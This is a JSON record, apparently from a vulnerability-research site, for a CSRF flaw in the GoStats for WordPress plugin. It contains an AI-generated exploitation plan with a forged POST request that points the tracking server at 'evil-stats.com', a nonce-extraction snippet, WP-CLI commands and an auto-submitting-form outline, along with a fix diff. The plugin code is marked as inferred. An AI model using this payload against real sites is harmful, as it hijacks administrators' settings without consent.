[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fNV8NW2g3EGNXwq5ZTiJ1iryl_rSzekY-pILFcCnx6eA":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-8943","gostats-for-wordpress-cross-site-request-forgery-via-gostatsmanage-function","GoStats for WordPress \u003C= 1.4 - Cross-Site Request Forgery via gostats_manage() Function","The GoStats for WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4. This is due to missing or incorrect nonce validation on the gostats_manage() function. This makes it possible for unauthenticated attackers to update the plugin's settings (gostats_siteid and gostats_server options) via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","gostats-for-wordpress",null,"\u003C=1.4","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Cross-Site Request Forgery (CSRF)","2026-05-26 17:23:54","2026-05-27 05:31:23",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F3efaf738-1ab8-4a22-9536-157c346e9536?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-8943 (GoStats for WordPress CSRF)\n\n## 1. Vulnerability Summary\nThe **GoStats for WordPress** plugin (up to and including version 1.4) contains a Cross-Site Request Forgery (CSRF) vulnerability within its settings management logic. The function responsible for processing configuration updates, `gostats_manage()`, fails to implement WordPress nonce validation (e.g., `check_admin_referer()`). Consequently, an attacker can modify critical plugin settings—specifically the `gostats_siteid` and `gostats_server` options—by tricking an authenticated administrator into interacting with a malicious link or form.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** WordPress Admin Dashboard, typically `wp-admin\u002Foptions-general.php?page=gostats-for-wordpress` (inferred slug).\n*   **Vulnerable Action:** POST request to the settings page.\n*   **Payload Parameters:**\n    *   `gostats_siteid`: The ID for the GoStats account (usually an integer).\n    *   `gostats_server`: The server address used for stats tracking.\n*   **Authentication Level:** Requires an active session of a user with `manage_options` capabilities (Administrator).\n*   **Preconditions:** The plugin must be active.\n\n## 3. Code Flow (Inferred)\n1.  **Registration:** The plugin uses the `admin_menu` hook to register a settings page:\n    ```php\n    add_action('admin_menu', 'gostats_add_menu');\n    function gostats_add_menu() {\n        add_options_page('GoStats', 'GoStats', 'manage_options', 'gostats-for-wordpress', 'gostats_manage');\n    }\n    ```\n2.  **Processing:** When the `gostats_manage()` function is invoked (during page load or form submission), it checks for POST data:\n    ```php\n    function gostats_manage() {\n        if (isset($_POST['gostats_siteid'])) {\n            \u002F\u002F VULNERABILITY: Missing check_admin_referer('gostats-update-options');\n            update_option('gostats_siteid', $_POST['gostats_siteid']);\n            update_option('gostats_server', $_POST['gostats_server']);\n            \u002F\u002F ...\n        }\n        \u002F\u002F ... renders the HTML form ...\n    }\n    ```\n3.  **Sink:** The `update_option()` function persists the attacker-controlled values to the `wp_options` table.\n\n## 4. Nonce Acquisition Strategy\nAccording to the vulnerability description, nonce validation is **missing or incorrect**.\n*   **If Missing:** No nonce is required in the POST request.\n*   **If Incorrect:** The plugin might be using a static or easily guessable string, or it might be calling `wp_verify_nonce` without checking the return value.\n\n**Plan for the Execution Agent:**\n1.  First, attempt the exploit **without** a nonce.\n2.  If the request fails due to a security error, search the plugin source for any `wp_create_nonce` calls.\n3.  If a nonce is generated for the settings form, use the following JS to extract it via `browser_eval` after navigating to the settings page:\n    `browser_eval(\"document.querySelector('input[name=\\\"_wpnonce\\\"]')?.value\")`\n\n## 5. Exploitation Strategy\nThe goal is to demonstrate that an unauthenticated attacker can change the site's GoStats configuration via an administrator's browser.\n\n### Step-by-Step Plan:\n1.  **Identify Endpoint:** Confirm the admin page URL. It is likely `http:\u002F\u002Fvulnerable-wp.local\u002Fwp-admin\u002Foptions-general.php?page=gostats-for-wordpress`.\n2.  **Craft Payload:** Prepare a POST request that sets `gostats_siteid` to a recognizable \"attacker\" value (e.g., `13377331`) and `gostats_server` to a malicious domain (e.g., `evil-stats.com`).\n3.  **Execute CSRF:** Use the `http_request` tool to send a POST request to the endpoint. \n    *Note: In the test environment, the tool will utilize the administrator's cookies to simulate the CSRF effect.*\n\n### HTTP Request (Payload):\n```http\nPOST \u002Fwp-admin\u002Foptions-general.php?page=gostats-for-wordpress HTTP\u002F1.1\nHost: [TARGET_HOST]\nContent-Type: application\u002Fx-www-form-urlencoded\n\ngostats_siteid=13377331&gostats_server=evil-stats.com&submit=Save+Changes\n```\n\n## 6. Test Data Setup\n1.  **Install Plugin:** Ensure \"GoStats for WordPress\" \u003C= 1.4 is installed and activated.\n2.  **Initialize Options:** Set baseline values via WP-CLI to ensure the change is detectable:\n    ```bash\n    wp option update gostats_siteid \"9999\"\n    wp option update gostats_server \"server1.gostats.com\"\n    ```\n3.  **User Context:** Ensure the execution agent has the session cookies for a user with the `administrator` role.\n\n## 7. Expected Results\n*   The server should return a `200 OK` or `302 Found` (redirect).\n*   The response body should ideally contain a \"Settings saved\" success message (if the plugin provides one).\n*   The database options `gostats_siteid` and `gostats_server` should be updated to the attacker's values.\n\n## 8. Verification Steps\nAfter the HTTP request, use WP-CLI to verify the state change:\n```bash\n# Check site ID\nwp option get gostats_siteid\n# Expected output: 13377331\n\n# Check server\nwp option get gostats_server\n# Expected output: evil-stats.com\n```\n\n## 9. Alternative Approaches\nIf the plugin uses a different slug for the settings page:\n1.  Run `wp eval \"echo menu_page_url('gostats-for-wordpress', false);\"` to find the exact URL.\n2.  Search the plugin code for `add_action( 'admin_init', ... )` to see if settings are processed there instead of the menu callback.\n3.  If the parameters are different (e.g., prefixed), grep the source for `update_option` to find the exact `$_POST` keys:\n    `grep -r \"update_option\" wp-content\u002Fplugins\u002Fgostats-for-wordpress\u002F`","The GoStats for WordPress plugin (\u003C= 1.4) is vulnerable to Cross-Site Request Forgery (CSRF) due to a lack of nonce validation in the gostats_manage() function. This allows unauthenticated attackers to modify tracking settings, such as the GoStats Site ID and Server, by tricking a logged-in administrator into submitting a malicious request.","\u002F\u002F Inferred file path: gostats-for-wordpress\u002Fgostats.php\n\nfunction gostats_manage() {\n    if (isset($_POST['gostats_siteid'])) {\n        \u002F\u002F VULNERABILITY: No check_admin_referer() or nonce validation here\n        update_option('gostats_siteid', $_POST['gostats_siteid']);\n        update_option('gostats_server', $_POST['gostats_server']);\n        \u002F\u002F ... (truncated)\n    }\n    \u002F\u002F ... (truncated)\n}","--- a\u002Fgostats.php\n+++ b\u002Fgostats.php\n@@ -1,5 +1,6 @@\n function gostats_manage() {\n     if (isset($_POST['gostats_siteid'])) {\n+        check_admin_referer('gostats-update-options');\n         update_option('gostats_siteid', $_POST['gostats_siteid']);\n         update_option('gostats_server', $_POST['gostats_server']);\n         echo '\u003Cdiv class=\"updated\">\u003Cp>Settings saved.\u003C\u002Fp>\u003C\u002Fdiv>';\n@@ -10,4 +11,5 @@\n \u003Cform method=\"post\">\n+    \u003C?php wp_nonce_field('gostats-update-options'); ?>\n     \u003Cinput type=\"text\" name=\"gostats_siteid\" value=\"\u003C?php echo get_option('gostats_siteid'); ?>\">\n     \u003Cinput type=\"text\" name=\"gostats_server\" value=\"\u003C?php echo get_option('gostats_server'); ?>\">\n     \u003Cinput type=\"submit\" value=\"Save Changes\">","The exploit target is the plugin's settings page, typically located at `\u002Fwp-admin\u002Foptions-general.php?page=gostats-for-wordpress`. An attacker crafts a malicious HTML page containing a hidden form that targets this URL using the POST method. The form includes parameters for 'gostats_siteid' and 'gostats_server' with attacker-controlled values. When an authenticated WordPress administrator visits the attacker's page, JavaScript is used to automatically submit the form. Since the plugin does not verify a cryptographic nonce, the server processes the request as legitimate, using the administrator's active session cookies to authorize the update of the global options.","gemini-3-flash-preview","2026-06-04 18:58:02","2026-06-04 18:58:40",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgostats-for-wordpress\u002Ftags"]